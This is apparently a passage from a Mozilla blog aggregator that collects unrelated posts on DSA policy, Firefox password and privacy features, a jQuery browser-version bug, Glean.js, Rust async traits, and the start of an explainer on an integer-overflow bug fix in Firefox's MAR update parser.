This is not only a problem on YouTube, but on the web at large. And while the DSA is not a silver bullet for addressing gender-based online harm, it can be an important part of the solution. To underscore that belief, we – as the Mozilla Foundation – have today signed on to a joint Call with stakeholders from across the digital rights, democracy, and womens’ rights communities. This Call aims to invigorate efforts to improve the DSA provisions around risk assessment and management, and ensure lawmakers appreciate the scale of gender-based online harm that communities face today.

This initiative complements other DSA-focused engagements that seek to address gender-based online harms. In July, we signaled our support for the Who Writes the Rules campaign, and we stand in solidarity with the just-published testimonies of gender-based online abuse faced by the initiative’s instigators.

The DSA has been rightly-billed as an accountability game-changer. Lawmakers owe it to those who suffer gender-based online harm to ensure those systemic risks are properly accounted for.

The full text of the Call can be read here.

The post Addressing gender-based online harms in the DSA appeared first on Open Policy & Advocacy.

The Mozilla BlogSuperhero passwords may be your kryptonite wherever you go online

A password is like a key to your house. In the online world, your password keeps your house of personal information safe, so a super strong password is like having a superhero in a fight of good vs. evil. In recognition of Cybersecurity Awareness month, we revisited our “Princesses make terrible passwords for Disney+ and every other account” post, and took a look to see how fortified superhero passwords are in the fight against hackers and breaches. According to haveibeenpwned.com, here is how many times these superhero passwords have shown up in breached datasets:

And if you thought maybe their real identities might make for a better password, think again!

Lucky for you, we’ve got a family of products from a company you can trust: Mozilla, a mission-driven organization with a 20-year track record of fighting for online privacy and a healthier internet. Here are your best tools in the fight against hackers and breaches:

Keep passwords safe from cyber threats with this new super power in Firefox on Android

This Cybersecurity Awareness month, we added new features for Firefox on Android, to keep your passwords safe. You might not have every password memorized by heart, nor do you need to when you use Firefox. With Firefox, users will be able to seamlessly access Firefox saved passwords. This means you can use any password you’ve saved in the browser to log into any online account like your Twitter or Instagram app. No need to open a web page. It’s that seamless and simple. Plus, you can also use biometric security, such as your face or fingerprint, to unlock the app and safely access your accounts. These new features will be available next Tuesday with the latest Firefox on Android release. Here are more details on the upcoming new features:

  • Creating and adding new passwords is easy – Now, when you create an account for any app on your mobile device, you can also create and add a new password, which you can save directly in the Firefox browser and use on both mobile and desktop.
  • Take your passwords with you on the go – Now you can easily autofill your password on your phone and use any password you’ve saved in the browser to log into any online account like your Twitter or Instagram app. No need to open a web page. Plus, if you have a Firefox account then you can sync all your passwords across desktop and mobile devices. It’s that seamless and simple. 
  • Unlock your passwords with your fingerprint and face – Now only you can safely open your accounts when you use biometric security such as your fingerprint or face to unlock the access page to your logins and passwords.

Forget J.A.R.V.I.S, keep informed of hacks and breaches with Firefox Monitor 

Keep your spidey senses from tingling every time you hear about hacks and breaches by signing up with Firefox Monitor. You’ll be able to keep an eye on your accounts once you sign up for Firefox Monitor and get alerts delivered to your email whenever there’s been a data breach or if your accounts have been hacked.

X Ray vision won’t work on a Virtual Private Network like Mozilla VPN

One of the reasons people use a Virtual Private Network (VPN), an encrypted connection that serves as a tunnel between your computer and VPN server, is to protect themselves whenever they use a public WiFi network. It sounds harmless, but public WiFi networks can be like a backdoor for hackers. With a VPN, you can rest assured you’re safe whenever you use the public WiFi network at your local cafe or library. Find and use a trusted VPN provider like our Mozilla VPN, a fast and easy-to-use VPN service. Thousands of people have signed up to subscribe to our Mozilla VPN, which provides encryption and device-level protection of your connection and information when you are on the Web.


How did we get these numbers? Unfortunately, we don’t have a J.A.R.V.I.S, so we looked these up in haveibeenpwned.com. We couldn’t access any data files, browse lists of passwords or link passwords to logins — that info is inaccessible and kept secure — but we could look up random passwords manually. Current numbers on the site may be higher than at time of publication as new datasets are added to HIBP. Alas, data breaches keep happening. There’s no time like the present to make sure all your passwords are built like Ironman.

The post Superhero passwords may be your kryptonite wherever you go online appeared first on The Mozilla Blog.

Hacks.Mozilla.OrgMDN Web Docs at Write the Docs Prague 2021

The MDN Web Docs team is pleased to sponsor Write the Docs Prague 2021, which is being held remotely this year. We’re excited to join hundreds of documentarians to learn more about collaborating with writers, developers, and readers to make better documentation. We plan to take part in all that the conference has to offer, including the Writing Day, Job Fair, and the virtual hallway track.

In particular, we’re looking forward to taking part in the Writing Day on Sunday, October 3, where we’ll be joining our friends from Open Web Docs (OWD) to work on MDN content updates together. We’re planning to invite our fellow conference attendees to take part in making open source documentation. OWD is also sponsoring Write the Docs; read their announcement to learn more.

The post MDN Web Docs at Write the Docs Prague 2021 appeared first on Mozilla Hacks - the Web developer blog.

Mike TaylorHow to delete your jQuery Reject Plugin in 1 easy step.

In my last post on testing Chrome version 100, I encouraged everyone to flip on that flag and report bugs. It’s with a heavy heart that I announce that Ian Kilpatrick did so, and found a bug.

(⌣_⌣”)

The predictable bug is that parks.smcgov.org will tell you your browser is out of date, and recommend that you upgrade it via a modal straight out of the year 2009.

screenshot of a modal telling you to upgrade your browser, with a farmville image because that was popular in 2009?

(Full Disclosure: I added the FarmVille bit so you can get back into a 2009 headspace, don’t sue me Zynga).

The bug is as follows:

r.versionNumber = parseFloat(r.version, 10) || 0;
var minorStart = 1;

if (r.versionNumber < 100 && r.versionNumber > 9) {
  minorStart = 2;
}

r.versionX = r.version !== x ? r.version.substr(0, minorStart) : x;
r.className = r.name + r.versionX;

Back when this was written, a version 100 was unfathomable (or more likely, the original authors were looking forward to the chaos of a world already dealing with the early effects of climate change, and now we have to deal with this?, a mere 11 years later) so the minorStart offset approach was perhaps reasonable.

There’s a few possible fixes here, as I see it:

I. Kick the can down the road a bit more:

if (r.versionNumber < 1000 && r.versionNumber > 99) {
  minorStart = 3;
}

I don’t really plan on being alive when Chrome 999 comes out, so.

II. Kick the can down the road like, way further:

r.versionX = Math.trunc(parseFloat(r.version)) || x;

According to jakobkummerow, this should work until browsers hit version 9007199254740991 (aka Number.MAX_SAFE_INTEGER in JS).
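
A quick sanity check of option II against a hypothetical version 100 user agent string (the version string and the "chrome" name below are made up for illustration):

// "100.0.4896.75" is a hypothetical version string for illustration.
parseFloat("100.0.4896.75");              // 100 (parsing stops at the second dot)
Math.trunc(parseFloat("100.0.4896.75"));  // 100
// r.className would then be "chrome" + 100 -> "chrome100", assuming r.name is "chrome".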

III. (Recommended) Just remove this script entirely from your site. It’s outlived its purpose.

Also, if you happen to work on any of the following 1936 sites using this script, you know what to do (pick option Roman numeral 3, just to be super clear).

Data@MozillaThis Week in Glean: Announcement: Glean.js v0.19.0 supports Node.js

(“This Week in Glean” is a series of blog posts that the Glean Team at Mozilla is using to try to communicate better about our work. They could be release notes, documentation, hopes, dreams, or whatever: so long as it is inspired by Glean. You can find an index of all TWiG posts online.)


From the start, the Glean JavaScript SDK (Glean.js) was conceptualized as a JavaScript telemetry library for diverse JavaScript environments. When we built the proof-of-concept, we tested that idea out and created a library that worked in Qt/QML apps, websites, web extensions, Node.js servers and CLIs, and Electron apps.

However, the stakes are completely different when implementing a proof-of-concept library versus a library to be used in production environments. Whereas for the proof-of-concept we wanted to try out as many platforms as possible, for the actual Glean.js library we want to minimize unnecessary work and focus on perfecting the features our users will actively benefit from. That meant that, up until a few weeks ago, Glean.js supported only browser extensions and Qt/QML apps. Today, it also supports Node.js environments.

🎉 (Of course, it’s always exciting to implement new features).

If you would also like to start using Glean.js in your Node.js project today, check out the “Adding Glean to your JavaScript project” guide over in the Glean book, but note that there is one caveat: the Node.js implementation does not contain persistent storage, which means every time the app is restarted the state is reset and Glean runs as if it were the first run ever of the app. In the spirit of not implementing things that are not required, we spoke to the users that requested Node.js support and concluded that for their use case persistent storage was not necessary. If your use case does require that, leave a comment over on Bug 1728807 and we will re-prioritize that work.
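
For a rough idea of what initialization might look like in a Node.js project (the import path and application id below are my assumptions, not taken from the guide; the linked guide is the authoritative reference):

// Rough sketch only; "@mozilla/glean/node" and "my-app-id" are assumptions here,
// see the "Adding Glean to your JavaScript project" guide for the real steps.
import Glean from "@mozilla/glean/node";

Glean.initialize("my-app-id", /* uploadEnabled */ true);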

:brizental

Firefox Add-on ReviewsTop anti-tracking extensions

The truth of modern tracking is that it happens in so many different and complex ways it’s practically impossible to ensure absolute tracking protection. But that doesn’t mean we’re powerless against personal data harvesters attempting to trace our every online move. There are a bunch of browser extensions that can give you tremendous anti-tracking advantages… 

Privacy Badger

Sophisticated and effective anti-tracker that doesn’t require any setup whatsoever. Simply install Privacy Badger and right away it begins the work of finding the most hidden types of trackers on the web.

Privacy Badger actually gets better at tracker blocking the more you use it. As you naturally navigate around the web and encounter new types of hidden trackers, Privacy Badger will find and block them, without relying on externally maintained block lists or other methods that may lag behind the latest trends in sneaky tracking. Privacy Badger also automatically removes tracking codes from outgoing links on Facebook and Google.

Decentraleyes

Another strong privacy protector that works well right out of the box, Decentraleyes effectively halts web page tracking requests from reaching third party content delivery networks (i.e. ad tech). 

A common issue with other extensions that try to block tracking requests is they also sometimes break the page itself, which is obviously not a great outcome. Decentraleyes solves this unfortunate side effect by injecting inert local files into the request, which protects your privacy (by distributing generic data instead of your personal info) while ensuring web pages don’t break in the process. Decentraleyes is also designed to work well with other types of content blockers like ad blockers.

ClearURLs

Ever noticed those long tracking codes that often get tagged to the end of your search result links or URLs on product pages from shopping sites? All that added guck to the URL is designed to track how you interact with the link. ClearURLs automatically removes the tracking clutter from links—giving you cleaner links and more privacy. 

Other key features include…

  • Clean up multiple URLs at once
  • Block hyperlink auditing (i.e. “ping tracking”; a method websites use to track clicks)
  • Block ETag tracking (i.e. “entity tags”; a tracking alternative to cookies)
  • Prevent Google and Yandex from rewriting search results to add tracking elements
  • Block some common ad domains (optional)

Disconnect

A strong privacy tool that fares well against hidden trackers used by some of the biggest players in the game, like Google, Facebook and Twitter, Disconnect also provides the benefit of significantly speeding up page loads simply by virtue of blocking all the unwanted tracking traffic.

Once installed, you’ll find a Disconnect button in your browser toolbar. Click it when visiting any website to see the number of trackers blocked (and where they’re from). You can also opt to unblock anything you feel you might need in your browsing experience. 

Cookie AutoDelete

Take control of your cookie trail with Cookie AutoDelete. Set it so cookies are automatically deleted every time you close a tab, or create safelists for select sites whose cookies you want to preserve.

After installation, you must enable “Auto-clean” for the extension to automatically wipe away cookies. This is so you first have an opportunity to create a custom safelist, should you choose, before accidentally clearing away cookies you might want to keep. 

There’s not much you have to do once you’ve got your safelist set, but clicking the extension’s toolbar button opens a pop-up menu with a few convenient options, like the ability to wipe away cookies from open tabs or clear cookies for just a particular domain.

Cookie AutoDelete’s pop-up menu gives you accessible cookie control wherever you go online.

Firefox Multi-Account Containers

Do you need to be simultaneously logged in to multiple accounts on the same platform, say for instance juggling various accounts on Google, Twitter, or Reddit? Multi-Account Containers can make your life a whole lot easier by helping you keep your many accounts “contained” in separate tabs so you can easily navigate between them without a need to constantly log in/out. 

By isolating your identities through containers, your browsing activity from one container isn’t correlated to another—making it far more difficult for these platforms to track and profile your holistic browsing behavior. 

Facebook Container

Does it come as a surprise that Facebook tries to track your online behavior beyond the confines of just Facebook? If so, I’m sorry to be the bearer of bad news. Facebook definitely tries to track you outside of Facebook. But with Facebook Container you can put a privacy barrier between the social media giant and your online life outside of it. 

Facebook primarily investigates your interests outside of Facebook through their various widgets you find embedded ubiquitously about the web (e.g. “Like” buttons or Facebook comments on articles, social share features, etc.) 

Social widgets like these give Facebook and other platforms a sneaky means of tracking your interests around the web.

The privacy trade-off we make for the convenience of not needing to sign in to Facebook each time we visit the site (because it recognizes your browser as yours) is that we give Facebook a potent way to track our moves around the web, since it can tell when you visit any web page embedded with its widgets.

Facebook Container basically allows you the best of both worlds—you can preserve the convenience of not needing to sign in/out of Facebook, while placing a “container” around your Facebook profile so the company can’t follow you around the web anymore.

We hope one of these anti-tracker extensions provides you with a strong new layer of security. Feel free to explore more powerful privacy extensions on addons.mozilla.org.

Firefox NightlyThese Weeks in Firefox: Issue 101

Highlights

    • We have begun to roll out Fission to a fraction of users on the release channel! Here’s a reminder of what Fission is, and why it matters
      • Telemetry so far doesn’t show any problems with stability or performance. We’re keeping an eye on it.
    • Fluent milestone 1 is 100% completed! All DTDs have been removed from browser.xhtml!
        • Caption: A burndown chart for strings in browser.xhtml, with no remaining DTDs left.
    • A new group of students from Michigan State University are working on improvements to High Contrast Mode. See the High Contrast Mode section below for details. Thanks to Noah, Shao, Danielle, Avi, and Jack!
    • about:processes is a page that you can go to to see which Firefox processes are taking up power and memory on your machine
      • It’s now possible to record a performance profile for a process with only a single click from within about:processes!
      • Here’s an animated GIF demonstrating an example workflow of one-click profiling
    • The new tab redesign has officially graduated. The pref to enable the pre-89 design has been removed.
    • Experimental improvements to macOS video power consumption will land soon in bug 1653417.
      • Fullscreen Youtube video on macOS consumes only 80% of the power it otherwise would.
      • We’re looking for testers! Flip gfx.core-animation.specialize-video to test. We’re looking specifically for visual glitches in the video or its controls. We’d also like to confirm that power usage is reduced for fullscreen YouTube and Twitch videos.

Friends of the Firefox team

Introductions/Shout-outs

    • [mconley] Welcome Yasmin Shash and Hanna Jones!
    • [vchin] Welcome to Amir who has started as Desktop Integrations EM!

For contributions from September 8th to September 21st 2021, inclusive.

Resolved bugs (excluding employees)

Fixed more than one bug

    • Antonin Loubiere
    • Itiel

New contributors (🌟 = first patch)

Project Updates

Add-ons / Web Extensions

WebExtensions Framework

Downloads Panel

Fluent

    • Milestone 1 has been completed! All DTDs have been removed from browser.xhtml!
      • As a bonus, this also means that all DTDs have been removed from the startup path, which was a goal for Milestone 2!
      • Are We Fluent Yet?
      • Congratulations to Katherine and Niklas for finally getting us over this milestone!

Form Autofill

High-Contrast Mode (MSU Capstone project)

Lint, Docs and Workflow

macOS Spotlight

    • Window spotlight buttons will now be on the correct side in RTL builds: bugs 1633860 & 1419375.
    • We noticed some users unfamiliar with macOS conventions were running Firefox directly from its DMG file. This can result in data loss and slow startup times, since Firefox is not fully installed. We now show a message warning the user in this scenario (bug 516362).

New Tab Page

    • New tab redesign has officially graduated. Old design pref & related code removed. Bug 1710937 👏
    • CSS variables simplified & cleaned up, allowing for easier theming (bugs 1727319, 1726432, 1727321)
    • The ntp_text theme API property was broken, and now it isn’t! (bug 1713778)

Nimbus / Experiments

    • Bug 1730924 We want to update the Ajv JSON schema validator in tree

Password Manager

PDFs & Printing

Performance

    • Gijs has filed some bugs to make process flipping less likely when Fission is enabled
    • We’ve been seeing a slow but steady decline in the percentage of clients on Nightly seeing tab switch spinners. This might be related to Fission, WebRender, hardware churn, or might be a measurement artifact due to old builds sending telemetry. We’re not sure.
    • Thanks to jstutte for landing a patch that removes some main thread IO during startup when checking if we need to be doing an LMDB migration!

Performance Tools

    • Thanks to our contributor, mhansen, Linux perf profiles now include different colors for kernel vs user stack frames.
    • Caption: Two side-by-side images of performance profiles; the right side now has bright colors.

Proton

Search and Navigation

    • Firefox Suggest is a new feature we’re working on to help you find the best of the web more quickly and easily!
    • Drew enabled the Firefox Suggest offline scenario for en-* users in the US region and made some tweaks to the Address Bar preferences UI
    • Daisuke fixed a regression where the Address Bar was not providing switch-tab results when history results were disabled – Bug 1477895

Screenshots

Niko MatsakisDyn async traits, part 1

Over the last few weeks, Tyler Mandry and I have been digging hard into what it will take to implement async fn in traits. Per the new lang team initiative process, we are collecting our design thoughts in an ever-evolving website, the async fundamentals initiative. If you’re interested in the area, you should definitely poke around; you may be interested to read about the MVP that we hope to stabilize first, or the (very much WIP) evaluation doc which covers some of the challenges we are still working out. I am going to be writing a series of blog posts focusing on one particular thing that we have been talking through: the problem of dyn and async fn. This first post introduces the problem and the general goal that we are shooting for (but don’t yet know the best way to reach).

What we’re shooting for

What we want is simple. Imagine this trait, for “async iterators”:

trait AsyncIter {
    type Item;
    async fn next(&mut self) -> Option<Self::Item>;
}

We would like you to be able to write a trait like that, and to implement it in the obvious way:

struct SleepyRange {
    start: u32,
    stop: u32,
}

impl AsyncIter for SleepyRange {
    type Item = u32;
    
    async fn next(&mut self) -> Option<Self::Item> {
        tokio::sleep(1000).await; // just to await something :)
        let s = self.start;
        if s < self.stop {
            self.start = s + 1;
            Some(s)
        } else {
            None
        }
    }
}

You should then be able to have a Box<dyn AsyncIter<Item = u32>> and use that in exactly the way you would use a Box<dyn Iterator<Item = u32>> (but with an await after each call to next, of course):

let b: Box<dyn AsyncIter<Item = u32>> = ...;
let i = b.next().await;

Desugaring to an associated type

Consider this running example:

trait AsyncIter {
    type Item;
    async fn next(&mut self) -> Option<Self::Item>;
}

Here, the next method will desugar to a fn that returns some kind of future; you can think of it like a generic associated type:

trait AsyncIter {
    type Item;

    type Next<'me>: Future<Output = Self::Item> + 'me;
    fn next(&mut self) -> Self::Next<'_>;
}

The corresponding desugaring for the impl would use type alias impl trait:

struct SleepyRange {
    start: u32,
    stop: u32,
}

// Type alias impl trait:
type SleepyRangeNext<'me> = impl Future<Output = u32> + 'me;

impl AsyncIter for SleepyRange {
    type Item = u32;
    
    type Next<'me> = SleepyRangeNext<'me>;
    fn next(&mut self) -> SleepyRangeNext<'_> {
        async move {
            tokio::sleep(1000).await;
            let s = self.start;
            ... // as above
        }
    }
}

This desugaring works quite well for standard generics (or impl Trait). Consider this function:

async fn process<T>(t: &mut T) -> u32
where
    T: AsyncIter<Item = u32>,
{
    let mut sum = 0;
    while let Some(x) = t.next().await {
        sum += x;
        if sum > 22 {
            break;
        }
    }
    sum
}

This code will work quite nicely. For example, when you call t.next(), the resulting future will be of type T::Next. After monomorphization, the compiler will be able to resolve <SleepyRange as AsyncIter>::Next to the SleepyRangeNext type, so that the future is known exactly. In fact, crates like embassy already use this desugaring, albeit manually and only on nightly.

Associated types don’t work for dyn

Unfortunately, this desugaring causes problems when you try to use dyn values. Today, when you have dyn AsyncIter, you must specify the values for all associated types defined in AsyncIter. So that means that instead of dyn AsyncIter<Item = u32>, you would have to write something like

for<'me> dyn AsyncIter<
    Item = u32, 
    Next<'me> = SleepyRangeNext<'me>,
>

This is clearly a non-starter from an ergonomic perspective, but it has an even more pernicious problem. The whole point of a dyn trait is to have a value where we don’t know what the underlying type is. But specifying the value of Next<'me> as SleepyRangeNext means that there is exactly one impl that could be in use here. This dyn value must be a SleepyRange, since no other impl has that same future.

Conclusion: For dyn AsyncIter to work, the future returned by next() must be independent of the actual impl. Furthermore, it must have a fixed size. In other words, it needs to be something like Box<dyn Future<Output = u32>>.

How the async-trait crate solves this problem

You may have used the async-trait crate. It resolves this problem by not using an associated type, but instead desugaring to Box<dyn Future> types:

trait AsyncIter {
    type Item;

    fn next(&mut self) -> Box<dyn Future<Output = Self::Item> + Send + '_>;
}

This has a few disadvantages:

  • It forces a Box all the time, even when you are using AsyncIter with static dispatch.
  • The type as given above says that the resulting future must be Send. For other async fn, we use auto traits to analyze automatically whether the resulting future is Send (it is Send if it can be, in other words; we don’t declare up front whether it must be).

Conclusion: Ideally we want Box when using dyn, but not otherwise

So far we’ve seen:

  • If we desugar async fn to an associated type, it works well for generic cases, because we can resolve the future to precisely the right type.
  • But it doesn’t work well for dyn trait, because the rules of Rust require that we specify the value of the associated type exactly. For dyn traits, we really want the returned future to be something like Box<dyn Future>.
    • Using Box does mean a slight performance penalty relative to static dispatch, because we must allocate the future dynamically.

What we would ideally want is to only pay the price of Box when using dyn:

  • When you use AsyncIter in generic types, you get the desugaring shown above, with no boxing and static dispatch.
  • But when you create a dyn AsyncIter, the future type becomes Box<dyn Future<Output = u32>>.
    • (And perhaps you can choose another “smart pointer” type besides Box, but I’ll ignore that for now and come back to it later.)

In upcoming posts, I will dig into some of the ways that we might achieve this.

Mozilla Attack & DefenseFixing a Security Bug by Changing a Function Signature


Or: The C Language Itself is a Security Risk, Exhibit #958,738

This post is aimed at people who are developers but who do not know C or low-level details about things like sign extension. In other words, if you’re a seasoned pro and you eat memory safety vulnerabilities for lunch, then this will all be familiar territory for you; our goal here is to dive deep into how integer overflows can happen in real code, and to break the topic down in detail for people who aren’t as familiar with this aspect of security.

The Bug

In July of 2020, I was sent Mozilla bug 1653371 (later assigned CVE-2020-15667). The reporter had found a segfault due to heap overflow in the library that parses MAR files1, which is the custom package format that’s used in the Firefox/Thunderbird application update system. So that doesn’t sound great. (spoiler: it isn’t as bad as it sounds because that overflow happens after the MAR file has had its signature validated already)

The Fix

The patch I wrote for this bug consists entirely of changing one function signature in a C source file from this:

static int mar_insert_item(MarFile* mar, const char* name, int namelen,
                           uint32_t offset, uint32_t length, uint32_t flags)

to this:

static int mar_insert_item(MarFile* mar, const char* name, uint32_t namelen,
                           uint32_t offset, uint32_t length, uint32_t flags)

I swear that is the entire patch. All I had to do was change the type of one of this function’s parameters from int to uint32_t. Can that change really fix a security bug? It can, and it did, and I’ll explain how. We have some background to cover first, though.

Background

The problem here comes down to numbers and how computers work with them, so let’s talk a bit about that first2. Since the bug is in a file written in the C language, our discussion will be from that perspective, but I am going to try to explain things so that you don’t need to know C or much at all about low-level programming in order to understand what happened.

Binary Numbers

Any number that your computer is going to work with has to be stored in terms of binary bits. The way those work isn’t as complicated as it might seem.

Think about how you write a number in decimal digits using place value. If we want to write the number one thousand, three hundred, and twelve, we need four digits: 1,312. What does each one of those digits mean? Well the rightmost 2 means… 2. But the 1 next to that doesn’t mean 1, it means 10. You take the digit itself and multiply that by 10 to get the value that’s being represented there. And then as you go through the rest of the digits, you go up by another power of 10 for each one. The 3 doesn’t mean either 3 or 30, it means 300, because it’s being multiplied by 100. And the leftmost 1 gets multiplied by 1000.

Guess what? Binary numbers work the same way. The only difference is, since binary only has two different digits, 0 and 1, it doesn’t make any sense to use powers of 10; there’d be loads of numbers we couldn’t write, anything greater than 1 but less than 10 couldn’t be represented. So instead of that, we use powers of 2. Each successive digit isn’t multiplied by 1, 10, 100, 1000, etc., it’s multiplied by 1, 2, 4, 8, etc.

Let’s look at a couple of examples. Here’s the number twelve in binary: 1100. Why? Well, let’s do the same thing we did with our decimal example, multiply each digit. I’ll write out the whole thing this time:

1100
│││└─ 0 x (2 ^ 0) = 0 x 1 = 0
││└── 0 x (2 ^ 1) = 0 x 2 = 0
│└─── 1 x (2 ^ 2) = 1 x 4 = 4
└──── 1 x (2 ^ 3) = 1 x 8 = 8

0 + 0 + 4 + 8 = 12

There we go! We got 12. For each digit, we multiply its value by the power of 2 for that place value location (and the multiplication is pretty darn easy, because the only digits are 0 and 1), and then add up all those results. That’s it!
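If you’d like to double-check conversions like these with code, here is a tiny C program (purely an illustration for this post, not anything from the MAR library) that walks a string of binary digits and applies exactly the multiply-by-powers-of-2 rule described above:

#include <stdio.h>

/* Convert a string of '0'/'1' characters to its numeric value by
   multiplying each digit by the appropriate power of 2, just like the
   worked example above. */
static unsigned int binary_to_decimal(const char *bits) {
  unsigned int value = 0;
  for (const char *p = bits; *p != '\0'; p++) {
    value = value * 2 + (unsigned int)(*p - '0');  /* shift in the next digit */
  }
  return value;
}

int main(void) {
  printf("1100  -> %u\n", binary_to_decimal("1100"));   /* prints 12 */
  printf("11001 -> %u\n", binary_to_decimal("11001"));  /* prints 25 */
  return 0;
}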

Binary Addition

Now, what if we need to do some math? That’s pretty much all computers are any good at, after all. Let’s say we want to add something to a binary number.

Well, we know how to do that in decimal: you add up each digit starting from the lowest one and carry over into the next digit if necessary. If you read the last section, you can probably guess what I’m about to say: that’s exactly what you do in binary too. Except again it’s even easier because there’s only two different digits.

Let’s have another simple example, 13 + 12. First we have to write both of those numbers in binary; we already know 12 is 1100, so 13 should just be one more than that, 1101. We’ll add them up the same way we add decimal numbers by hand:

  1100
+ 1101
------
 ?????

The first two digits are easy, 0 + 1 = 1, and 0 + 0 = 0.

  1100
+ 1101
------
 ???01

But now we have 1 + 1. Where do we go with that? There’s no 2. Well, just like in decimal, we have to carry out of that digit; the sum of 1 and 1 in binary is 10 (because that’s just binary for 2), so that means we need to write a 0 in that column and carry the 1.

  1
  1100
+ 1101
------
 ??001

Only one digit to go. Again, it’s 1 + 1, but now we have a 1 carried over from the previous digit. So really we have to do 1 + 1 + 1, which is 3 but in binary that’s 11. This is the last column now, so we don’t have to worry about carries anymore, we can just write that down:

  1
  1100
+ 1101
------
 11001

And we’re done! 1100 + 1101 = 11001. And to prove we got the right answer, let’s convert 11001 back to decimal, the same way we did before:

11001
││││└ 1 x (2 ^ 0) = 1 x  1 =  1
│││└─ 0 x (2 ^ 1) = 0 x  2 =  0
││└── 0 x (2 ^ 2) = 0 x  4 =  0
│└─── 1 x (2 ^ 3) = 1 x  8 =  8
└──── 1 x (2 ^ 4) = 1 x 16 = 16

1 + 0 + 0 + 8 + 16 = 25

So now we know we were right; 12 + 13 = 25, and 1100 + 1101 = 11001. That’s how you add numbers in binary.
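If you’d rather let the machine do the checking, here is a short C snippet (again, just an illustration) that performs the same 12 + 13 addition and prints both operands and the result as binary digits:

#include <stdio.h>

/* Print the low `width` bits of `value`, most significant bit first. */
static void print_binary(unsigned int value, int width) {
  for (int i = width - 1; i >= 0; i--) {
    putchar(((value >> i) & 1u) ? '1' : '0');
  }
  putchar('\n');
}

int main(void) {
  unsigned int a = 12, b = 13;
  print_binary(a, 5);       /* 01100 */
  print_binary(b, 5);       /* 01101 */
  print_binary(a + b, 5);   /* 11001, which is 25 */
  return 0;
}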

Signed Integers and Two’s Complement

So far we’ve only talked about positive numbers, but that’s not all computers can handle; sometimes you also need negative numbers. But you don’t want every number to potentially be negative; a lot of the kinds of things that you need to keep track of in a program just cannot possibly be negative, and sometimes (as we’ll see) allowing certain things to be negative can be actively harmful.

So, computers (and many languages, including C) provide two different kinds of integers that the programmer can select between whenever they need an integer: “signed” or “unsigned”. “Signed” means that the number can be either negative or positive (or zero), and “unsigned” means it can only be positive (or zero)3.

What we’ve been talking about up to now are unsigned integers, so how do signed integers work? To start with, the first bit of the number isn’t part of the number itself anymore, it’s now the “sign bit”. If the sign bit is 0, the number is nonnegative (either zero or positive), and if the sign bit is 1, the number is negative. But, when the sign bit is 1, we need a couple extra steps to convert between binary and decimal. Here’s the procedure.

  1. Discard the sign bit before doing anything else.
  2. Invert all the other bits in the number, meaning make every 1 a 0 and vice versa.
  3. Convert that binary number (the one with the bits flipped) to decimal the usual way.
  4. Add 1 to that result.

This operation, with the inversion and the adding 1, is called “two’s complement”, and it’ll get you the value of the negative number. Let’s go through another simple example.

Let’s say we have a signed 8-bit integer and the value is 11010110. What is that in decimal? Well, we see right away that the sign bit is set, so we need to take the two’s complement. First, we need to flip all the bits except the sign bit, so that gets us 0101001. Now we convert that to decimal and add 1.

0101001
││││││└ 1 x (2 ^ 0) = 1 x  1 =  1
│││││└─ 0 x (2 ^ 1) = 0 x  2 =  0
││││└── 0 x (2 ^ 2) = 0 x  4 =  0
│││└─── 1 x (2 ^ 3) = 1 x  8 =  8
││└──── 0 x (2 ^ 4) = 0 x 16 =  0
│└───── 1 x (2 ^ 5) = 1 x 32 = 32
└────── 0 x (2 ^ 6) = 0 x 64 =  0

1 + 0 + 0 + 8 + 0 + 32 + 0 = 41

41 + 1 = 42

Now just remember to add back the negative sign, and we get -42. That’s our number! 11010110 interpreted as a signed integer is -42.
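You can watch that reinterpretation happen in C. This little program (an illustration only; it relies on the two’s complement behavior that essentially all modern hardware uses) takes the same bit pattern, 11010110, and prints it both as an unsigned and as a signed 8-bit integer:

#include <stdint.h>
#include <stdio.h>

int main(void) {
  uint8_t bits = 214;   /* the bit pattern 11010110 */

  /* Read as an unsigned 8-bit integer, these bits mean 214. */
  printf("unsigned: %u\n", (unsigned int)bits);

  /* Reinterpreted as a signed (two's complement) 8-bit integer,
     the very same bit pattern means -42 on two's complement machines. */
  int8_t value = (int8_t)bits;
  printf("signed:   %d\n", (int)value);
  return 0;
}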

Why?

Why do we bother with any of this? Why not do something simple like have the sign bit and then just the regular number4? Well, the two’s complement representation has one huge advantage: you can completely disregard it while doing basic arithmetic. The exact same hardware and logic can do arithmetic on both unsigned numbers and signed two’s complement numbers5. That means the hardware is simpler, which means it’s smaller, cheaper, and faster. That mattered more in the early days of digital computers, which is why two’s complement caught on as the standard, and it’s still with us today.

Sign Extension

There’s one other neat trick two’s complement lets us do that we need to talk about. Integers in computers have a fixed “width”, or number of bits that are used to represent them. Wider integers can represent larger (or more negative) numbers, but take up more space in the computer’s memory. So to balance those concerns, languages like C give the programmer access to a few different bit widths to choose from for their integers.

So, what happens if we need to do some arithmetic between integers that are different widths, or just pass an integer into a function that’s narrower than the function expects? We need a way to make an integer wider. If it’s unsigned, that’s easy; copy over the same value into the lower (right-hand) bits and then fill in the new high bits with 0’s, and you’ll have the same value, just now with more bits.

But what if we need to widen a signed integer? Two’s complement’s here to save the day with a solution called “sign extension”. It turns out all we have to do to make a two’s complement integer wider is copy over the same value into the low bits and then fill in the new high bits with copies of the sign bit. That’s it.

It’s easy to see why that’s correct if we think about how two’s complement works. If the number is positive (the sign bit is 0), then it’s the same as for an unsigned number, we’ll fill in the new space with all zeroes and nothing changes. And if the number is negative (the sign bit is 1), then we’ll fill in the new space with 1 bits, but the two’s complement operation means those bits all get inverted into 0’s when we need to get the number’s value, so still nothing changes. These simple, efficient operations are why two’s complement is so neat, despite seeming weird and overcomplicated at first.
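Here is what sign extension looks like from C (again, just a standalone illustration): we take a negative 32-bit value, widen it to 64 bits, and then look at the bits that come out the other side, printed in hexadecimal, which is covered in the next section.

#include <inttypes.h>
#include <stdint.h>
#include <stdio.h>

int main(void) {
  int32_t narrow = -42;   /* bit pattern 0xFFFFFFD6 */
  int64_t wide = narrow;  /* implicit widening performs sign extension */

  /* The value is preserved: still -42. The new high bits are all 1s,
     copies of the original sign bit. */
  printf("wide value = %" PRId64 "\n", wide);
  printf("wide bits  = 0x%016" PRIX64 "\n", (uint64_t)wide);  /* 0xFFFFFFFFFFFFFFD6 */
  return 0;
}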

Hexadecimal Numbers

I’m going to use a few hexadecimal numbers in this article, but don’t worry, I’m not going to try to teach you how to work in a whole different number system yet again. You can think of hexadecimal as a shorthand for binary numbers. Hexadecimal (“hex” for short) uses the decimal digits 0-9 and also the letters A-F, for 16 possible digits total. Since each digit can have 16 values, each one can stand in for four binary digits.

